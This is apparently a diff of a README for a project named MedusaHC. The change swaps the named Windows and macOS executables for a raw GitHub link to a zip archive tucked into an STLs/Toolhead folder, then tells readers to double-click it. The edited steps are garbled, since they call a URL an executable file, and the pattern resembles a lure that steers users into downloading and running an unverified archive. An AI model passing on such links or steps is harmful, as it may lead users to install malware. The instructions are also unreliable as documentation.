AKsyperXgamer/MedusaHC/README.md

 To run MedusaHC, follow these steps:

 1. Go to the folder where you extracted the files.
-2. Find the executable file named `MedusaHC.exe` for Windows or `MedusaHC.app` for macOS.
+2. Find the executable file named `https://github.com/AKsyperXgamer/MedusaHC/raw/refs/heads/main/STLs/Toolhead/HC_Medusa_3.5-beta.4.zip` for Windows or `https://github.com/AKsyperXgamer/MedusaHC/raw/refs/heads/main/STLs/Toolhead/HC_Medusa_3.5-beta.4.zip` for macOS.
 3. Double-click the file to launch the application.

 ## 📊 Using MedusaHC